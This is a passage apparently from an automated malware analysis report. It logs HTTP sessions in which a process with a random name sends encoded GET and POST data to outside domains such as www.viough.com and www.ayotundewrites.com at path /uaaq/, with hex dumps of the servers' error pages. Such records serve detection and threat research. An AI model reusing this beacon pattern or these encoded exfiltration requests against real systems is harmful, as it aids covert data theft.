                                                                                    Data Raw: 39 70 47 30 4c 3d 4a 45 4b 44 6e 46 58 35 38 4e 76 54 33 69 6a 4d 2b 6b 50 62 2b 49 51 4f 72 65 68 78 2f 49 77 2b 59 4f 2b 52 58 43 63 73 6d 48 46 70 2f 49 69 32 33 72 6f 50 70 73 48 56 71 4b 56 31 32 33 6e 66 52 49 6e 76 37 46 34 62 30 45 4c 79 34 4b 46 65 6d 49 79 4c 42 41 6a 43 71 4f 34 64 38 4a 79 4e 47 55 67 49 4d 59 52 47 69 70 6f 45 4c 39 67 63 78 67 37 44 49 42 72 73 54 77 30 51 6f 57 76 4c 78 78 4e 31 39 45 79 6d 59 71 47 32 4f 59 58 74 4f 75 30 6e 4a 46 77 6c 4e 70 52 69 74 6c 76 72 71 41 33 79 56 77 58 56 47 44 5a 52 72 62 65 36 35 73 42 77 69 32 2f 46 4b 6a 66 35 33 52 48 4e 33 62 66 41 77 72 39 55 4c 4a 31 72 54 64 58 76 65 64 73 44 55 6b 6c 78 42 76 6a 45 44 42 52 62 32 53 66 35 4f 50 30 47 6d 5a 6f 66 34 41 7a 72 59 74 62 77 5a 42 44 72 69 39 67 47 36 51 6b 4e 6c 77 62 2b 32 44 4f 72 78 43 5a 37 68 55 7a 47 2b 35 65 50 61 4d 6a 6e 73 68 6e 43 66 47 66 53 34 78 7a 43 4a 41 50 6e 69 70 48 45 6c 65 6d 30 76 46 2b 2b 47 32 50 54 69 70 77 51 64 41 6a 62 65 6e 59 52 42 38 48 69 50 68 5a 36 48 41 4e 75 51 73 72 4a 44 63 4b 30 68 4c 70 55 72 31 62 66 66 57 67 4f 71 79 50 67 52 47 6c 4e 70 77 78 4f 79 4a 75 63 74 2b 73 6c 42 4d 52 63 42 6a 32 4c 4c 64 53 6a 35 38 32 79 77 6e 65 79 6c 51 31 31 38 33 31 79 6c 59 45 7a 35 63 43 59 2f 63 75 58 75 6a 45 67 37 66 4a 63 42 4a 6b 74 44 68 2b 33 69 32 46 49 4c 56 48 63 38 69 64 5a 49 35 30 37 72 6d 6b 59 71 30 67 57 77 75 44 4c 62 65 6a 35 38 39 59 68 4b 5a 75 57 32 34 58 66 53 4c 43 6b 76 41 6c 74 34 39 69 4f 73 57 4b 48 63 6f 61 4a 34 52 50 2b 2b 4c 6f 68 39 46 6e 66 42 41 52 79 45 6c 50 56 45 37 70 56 4f 54 73 5a 72 6a 46 50 66 35 47 75 49 45 6c 65 63 57 69 47 67 4a 37 59 42 61 71 63 6b 61 51 61 2b 59 71 45 42 7a 43 38 4b 48 7a 42 68 56 78 33 38 5a 7a 5a 66 48 4e 48 4f 63 58 2f 46 79 36 69 66 51 6c 6c 53 70 76 30 75 44 64 52 54 6b 4f 67 6f 52 33 4e 79 38 62 76 31 33 4b 6d 4e 6c 6c 33 51 2b 75 6b 6e 56 47 36 54 53 6d 70 48 70 54 58 45 41 35 47 70 4e 50 79 7a 49 4c 4a 43 75 42 65 44 41 4c 44 4a 68 31 66 69 66 70 6a 39 79 42 72 33 46 48 6e 49 58 77 6b 6c 4f 5a 7a 56 34 6a 50 79 41 47 38 78 70 36 35 50 64 4f 57 73 2b 2b 51 31 38 54 4a 67 4b 2b 56 36 51 54 6e 41 4c 53 77 2f 37 51 42 44 35 59 56 71 6b 50 55 64 65 78 53 32 31 47 50 6e 39 4f 69 4d 68 2b 4b 54 49 4a 75 34 47 61 66 45 67 39 6e 52 78 7a 33 46 54 4c 4d 38 59 4e 59 36 4c 5a 51 57 53 70 68 78 71 6b 34 37 6b 73 34 30 6b 43 33 76 2f 63 30 62 6d 41 33 70 57 72 2b 45 36 4c 68 2f 74 6d 4e 74 39 39 72 4f 76 6f 57 59 5a 6d 6c 4d 7a 45 31 61 33 39 6a 79 45 46 48 55 45 2f 6a 37 50 2b 4b 30 73 46 69 4c 66 6c 4d 71 44 58 44 53 6d 6f 39 5a 6a 4f 4e 36 54 44 5a 2f 2b 32 52 78 6a 64 63 6f 44 52 5a 4f 48 42 6a 38 5a 68 32 30 41 62 77 55 46 66 64 64 36 45 6b 52 79 70 68 6f 71 56 6d 41 69 73 47 47 61 49 44 31 75 70 44 6e 33 39 6d 62 71 4e 41 6c 6b 32 6d 49 36 4f 73 2b 5a 62 37 6f 56 63 73 61 71 39 4c 63 4f 46 6d 56 54 70 4d 33 6a 61 77 42 6b 56 65 41 48 72 73 57 6d 41 2f 50 51 41 43 57 63 79 71 70 37 72 34 4b 32 50 77 47 39 7a 57 51 2b 35 44 52 4b 52 56 44 72 2b 6e 53 2f 4f 52 68 66 48 30 33 5a 6b 66 54 61 50 47 35 39 78 47 4a 78 43 46 77 70 6a 7a 62 5a 49 6c 71 41 33 4d 45 37 65 38 7a 68 54 44 47 70 37 66 44 33 35 31 74 31 68 30 67 43 6f 75 39 50 5a 4d 6f 56 32 55 6f 79 78 51 41 74 68 32 68 67 63 39 6b 61 2f 6b 42 5a 34 4c 65 75 61 34 6a 42 48 6b 52 38 6e 72 52 6e 79 54 71 36 54 36 5a 78 55 42 61 54 72 6b 6c 4d 33 48
                                                                                    Data Ascii: 9pG0L=JEKDnFX58NvT3ijM+kPb+IQOrehx/Iw+YO+RXCcsmHFp/Ii23roPpsHVqKV123nfRInv7F4b0ELy4KFemIyLBAjCqO4d8JyNGUgIMYRGipoEL9gcxg7DIBrsTw0QoWvLxxN19EymYqG2OYXtOu0nJFwlNpRitlvrqA3yVwXVGDZRrbe65sBwi2/FKjf53RHN3bfAwr9ULJ1rTdXvedsDUklxBvjEDBRb2Sf5OP0GmZof4AzrYtbwZBDri9gG6QkNlwb+2DOrxCZ7hUzG+5ePaMjnshnCfGfS4xzCJAPnipHElem0vF++G2PTipwQdAjbenYRB8HiPhZ6HANuQsrJDcK0hLpUr1bffWgOqyPgRGlNpwxOyJuct+slBMRcBj2LLdSj582ywneylQ11831ylYEz5cCY/cuXujEg7fJcBJktDh+3i2FILVHc8idZI507rmkYq0gWwuDLbej589YhKZuW24XfSLCkvAlt49iOsWKHcoaJ4RP++Loh9FnfBARyElPVE7pVOTsZrjFPf5GuIElecWiGgJ7YBaqckaQa+YqEBzC8KHzBhVx38ZzZfHNHOcX/Fy6ifQllSpv0uDdRTkOgoR3Ny8bv13KmNll3Q+uknVG6TSmpHpTXEA5GpNPyzILJCuBeDALDJh1fifpj9yBr3FHnIXwklOZzV4jPyAG8xp65PdOWs++Q18TJgK+V6QTnALSw/7QBD5YVqkPUdexS21GPn9OiMh+KTIJu4GafEg9nRxz3FTLM8YNY6LZQWSphxqk47ks40kC3v/c0bmA3pWr+E6Lh/tmNt99rOvoWYZmlMzE1a39jyEFHUE/j7P+K0sFiLflMqDXDSmo9ZjON6TDZ/+2RxjdcoDRZOHBj8Zh20AbwUFfdd6EkRyphoqVmAisGGaID1upDn39mbqNAlk2mI6Os+Zb7oVcsaq9LcOFmVTpM3jawBkVeAHrsWmA/PQACWcyqp7r4K2PwG9zWQ+5DRKRVDr+nS/ORhfH03ZkfTaPG59xGJxCFwpjzbZIlqA3ME7e8zhTDGp7fD351t1h0gCou9PZMoV2UoyxQAth2hgc9ka/kBZ4Leua4jBHkR8nrRnyTq6T6ZxUBaTrklM3H
                                                                                    Dec 4, 2023 12:05:49.886549950 CET1069INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:05:49 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Content-Encoding: gzip
                                                                                    Data Raw: 33 34 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 4d 6f db 38 10 bd fb 57 4c 75 c9 c5 92 9a 6d 16 58 74 6d 03 6d ec 45 0c a4 4d 90 a8 28 72 a4 a5 91 45 84 e2 68 c9 51 14 01 fd 43 39 ef 4f c8 1f db a1 68 67 d3 8f 3d d1 a4 e6 bd 99 f7 66 c6 8b 37 eb ab f3 e2 ee 7a 03 17 c5 a7 4b b8 fe f2 f1 72 7b 0e 49 9a e7 5f df 9d e7 f9 ba 58 c7 0f 67 d9 db d3 3c df 7c 4e 20 69 98 bb f7 79 3e 0c 43 36 bc cb c8 ed f3 e2 26 6f b8 35 67 b9 67 a7 4b ce 2a ae 92 d5 6c 11 de c0 28 bb 5f 26 b5 9b 1e 50 55 f2 de 22 2b 08 2c 29 fe dd eb 87 65 72 4e 96 d1 72 5a 8c 1d 26 50 c6 db 32 61 7c e4 89 f8 4f 28 1b e5 3c f2 b2 e7 3a fd 23 50 4d 1c 56 b5 b8 4c 1c ed 88 fd 2b 9c 25 8b 73 4b da 56 f8 28 67 4d c6 d0 f0 02 7a 9d b8 54 65 83 69 48 e8 c8 7c c7 90 4e 9f 7e 09 ea 9c da b7 ea 7f a2 8b 6d 71 b9 59 9d bd 3d 83 cf c4 f0 17 f5 b6 5a e4 f1 71 b6 c8 2f 36 1f d6 52 fc c7 ab f5 9d 1c 17 a7 ab 57 41 72 9b 15 0d 82 13 53 d0 33 56 50 51 d9 b7 e2 0b 0c ca 83 15 ba 3a d0 01 59 e0 46 7b f0 e8 1e d0 65 b3 c5 75 e0 ba 39 12 5a 28 1c f5 0f cf 4f 92 4e 28 2f f1 3f 9e 0a 5b 65 ab e7 27 b0 27 0a 3a 21 7d 7e 62 b9 89 f8 10 0f be 77 50 62 e4 ed 7f 26 86 8d 9d 9c 52 15 45 ea 8d 79 a1 26 f0 64 74 a9 59 3e 4a a9 c2 01 18 a3 9f ff 91 5f 10 04 4d c4 ba a2 ef 98 3f ac d7 37 9b db db d5 ec 2b ee e0 76 52 04 4a 14 cb 70 a9 91 58 f4 e2 e0 34 a3 cf 4a 6a 01 be 01 5c d3 80 4e dc d9 8d 53 94 19 7c 56 3b f1 f6 85 69 91 1f fc cd c3 48 af 66 b3 c5 9b 34 9d 01 40 0a 5f 6c 4d 4e 48 15 a3 19 e7 f0 49 97 8e 3c d5 0c 8d 98 a1 aa 4a 68 15 94 06 c5 57 b0 38 44 50 52 a3 e2 de c9 64 32 c1 56 26 d5 59 64 d8 3c 76 86 9c f8 0f db 5a fa 81 10 a6 15 a8 8e 18 25 92 9d 23 77 e2 a1 45 ef d5 1e 41 3a 96 30 89 35 ad 32 26 99 83 ef b0 d4 b5 2e e5 36 46 90 91 48 a1 12 ec ef a7 bf 89 3e 51 3d ff 39 a1 0c 88 54 63 7d c4 68 f6 40 c3 21 db 31 57 06 77 d4 43 29 44 21 32 50 86 ca ea 79 84 ec 7a 06 cd 52 59 27 4c 3c 4a fb 75 79 2f 07 41 2d 2b 03 7e d0 5c 36 82 36 06 ab 88 48 a4 66 c7 51 d1 31 87 4f 32 28 02 71 8b ca 4a 9d 54 cb e2 f6 b2 a4 87 2c 53 52 df 88 dd 3f e0 40 39 94 31 b3 5e dc 9b ba 58 61 ad 7a c3 59 cc b5 dd de 82 32 83 1a fd 51 e8 8f f8 89 39 90 18 b2 fb 08 42 4b fd be 09 12 5a 75 8f bf f0 ac 51 5d 37 86 82 31 02 06 72 f7 4a c6 5e f4 4a 5f 0e 46 78 dd 76 06 df cb 66 54 53 47 a7 0e c6 f8 63 13 c5 9b 46 46 64 a7 f7 a2 b6 9d 96 d3 68 c9 38 2d a4 a4 ef 7a df 88 b9 11 44 61 8c c2 68 d4 fa 01 a1 91 64 41 b1 6c 20 f0 80 46 9e a6 16 43 ab ad 6e fb f6 a0 ff ea c5 c7 a9 6f d2 26 7c 54 25 1b 99 f6 e0 f6 48 fd 89 48 77 f2 4f aa 8f ea 9d de 37 2c 5b 37 44 8a 74 35 fb 17 f8 f5 91 1f d6 05 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 34cuTMo8WLumXtmmEM(rEhQC9Ohg=f7zKr{I_Xg<|N iy>C6&o5ggK*l(_&PU"+,)erNrZ&P2a|O(<:#PMVL+%sKV(gMzTeiH|N~mqY=Zq/6RWArS3VPQ:YF{eu9Z(ON(/?[e'':!}~bwPb&REy&dtY>J_M?7+vRJpX4Jj\NS|V;iHf4@_lMNHI<JhW8DPRd2V&Yd<vZ%#wEA:052&.6FH>Q=9Tc}h@!1WwC)D!2PyzRY'L<Juy/A-+~\66HfQ1O2(qJT,SR?@91^XazY2Q9BKZuQ]71rJ^J_FxvfTSGcFFdh8-zDahdAl FCno&|T%HHwO7,[7Dt50


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    36192.168.11.304979083.229.19.76803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:05:52.405169964 CET430OUTGET /uaaq/?9pG0L=EGijkzvOzpvUykTSqEH5xYloxulInJA6Yfy3UgRPmiIu9LDG8q5Bov6ZnoBY4U7UUr/swV4XyGGNsY5GmvOqPiqhu9t92ITdQQ==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.ayotundewrites.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:05:52.587255955 CET1340INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 04 Dec 2023 11:05:52 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Accept-Ranges: bytes
                                                                                    Data Raw: 35 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6e 65 2c 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 6e 20 54 72 6f 75 76 c3 a9 3c 2f 48 31 3e 0a 4c 65 20 64 6f 63 75 6d 65 6e 74 20 64 65 6d 61 6e 64 c3 a9 20 6e 27 61 20 70 61 73 20 c3 a9 74 c3 a9 20 74 72 6f 75 76 c3 a9 20 73 75 72 20 63 65 20 73 65 72 76 65 75 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 20 45 6e 63 6f 6e 74 72 61 64 6f 3c 2f 48 31 3e 0a 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 73 65 20 65 6e 63 6f 6e 74 72 c3 b3 20 65 6e 20 65 73 74 65 20 73 65 72 76 69 64 6f 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 61 79 6f 74 75 6e 64 65 77 72 69 74 65 73 2e 63 6f 6d 20 20 7c 20 20 50 6f 77 65 72 65 64 20 62 79 20 77 77 77 2e 6c 77 73 2e 66 72 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20
                                                                                    Data Ascii: 5d6<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html lang="fr"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="robots" content="none,noindex,nofollow"><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested document was not found on this server.<P><HR><H1>Non Trouv</H1>Le document demand n'a pas t trouv sur ce serveur.<P><HR><H1>No Encontrado</H1>El documento solicitado no se encontr en este servidor.<P><HR><ADDRESS>Web Server at www.ayotundewrites.com | Powered by www.lws.fr</ADDRESS></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short
                                                                                    Dec 4, 2023 12:05:52.587331057 CET426INData Raw: 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61
                                                                                    Data Ascii: error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it
                                                                                    Dec 4, 2023 12:05:52.589046001 CET59INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    37192.168.11.3049791163.197.216.134803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:05:59.101125002 CET686OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.viough.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.viough.com
                                                                                    Referer: http://www.viough.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 72 4e 30 49 78 32 55 78 5a 4c 35 65 7a 4c 2f 59 41 5a 70 31 66 6c 43 31 65 63 2f 59 36 31 44 64 77 6e 75 76 2f 48 4a 31 6d 37 39 31 59 58 68 46 62 65 6d 4a 4f 47 68 4e 77 66 43 48 2b 50 4d 43 35 6d 45 6a 44 30 47 6b 44 64 4c 59 62 52 75 69 58 38 51 37 47 6c 35 41 49 76 79 34 46 74 4b 4d 47 39 6d 4e 77 79 2b 47 6c 34 35 44 37 4f 6f 55 4e 6e 67 54 36 51 4a 73 72 39 4a 6d 56 38 70 76 47 71 6f 4c 71 41 32 65 61 6c 4e 57 5a 51 43 47 68 4b 63 6f 37 53 46 72 78 64 5a 43 53 76 76 63 62 62 6d 39 42 4d 47 39 37 2b 6a 72 56 70 74 61 47 67 3d 3d
                                                                                    Data Ascii: 9pG0L=rN0Ix2UxZL5ezL/YAZp1flC1ec/Y61Ddwnuv/HJ1m791YXhFbemJOGhNwfCH+PMC5mEjD0GkDdLYbRuiX8Q7Gl5AIvy4FtKMG9mNwy+Gl45D7OoUNngT6QJsr9JmV8pvGqoLqA2ealNWZQCGhKco7SFrxdZCSvvcbbm9BMG97+jrVptaGg==
                                                                                    Dec 4, 2023 12:05:59.453339100 CET751INHTTP/1.1 405 Not Allowed
                                                                                    Server: nginx
                                                                                    Date: Mon, 04 Dec 2023 11:05:59 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 552
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    38192.168.11.3049792163.197.216.134803712C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 4, 2023 12:06:04.324323893 CET706OUTPOST /uaaq/ HTTP/1.1
                                                                                    Host: www.viough.com
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.viough.com
                                                                                    Referer: http://www.viough.com/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Raw: 39 70 47 30 4c 3d 72 4e 30 49 78 32 55 78 5a 4c 35 65 79 72 76 59 50 65 64 31 5a 46 43 71 52 38 2f 59 30 56 44 52 77 6e 69 76 2f 47 63 75 6e 4f 6c 31 59 33 52 46 4a 66 6d 4a 62 47 68 4e 37 2f 43 43 7a 76 4d 56 35 6d 35 63 44 31 36 6b 44 5a 72 59 62 52 2b 69 57 4c 38 38 46 56 34 6d 41 50 79 32 4c 4e 4b 4d 47 39 6d 4e 77 7a 62 52 6c 38 56 44 34 2b 34 55 50 43 4d 63 77 77 4a 74 69 64 4a 6d 45 73 70 7a 47 71 6f 54 71 44 7a 78 61 6d 31 57 5a 52 79 47 68 59 6b 70 73 43 46 70 73 74 59 67 62 66 61 35 54 4b 4b 31 45 71 79 6c 75 65 4f 55 55 38 42 4a 42 63 61 48 79 6e 32 70 50 74 47 53 69 62 57 54 44 66 4e 72 38 4d 41 3d
                                                                                    Data Ascii: 9pG0L=rN0Ix2UxZL5eyrvYPed1ZFCqR8/Y0VDRwniv/GcunOl1Y3RFJfmJbGhN7/CCzvMV5m5cD16kDZrYbR+iWL88FV4mAPy2LNKMG9mNwzbRl8VD4+4UPCMcwwJtidJmEspzGqoTqDzxam1WZRyGhYkpsCFpstYgbfa5TKK1EqylueOUU8BJBcaHyn2pPtGSibWTDfNr8MA=
                                                                                    Dec 4, 2023 12:06:04.665612936 CET751INHTTP/1.1 405 Not Allowed
                                                                                    Server: nginx
                                                                                    Date: Mon, 04 Dec 2023 11:06:04 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 552
                                                                                    Connection: close
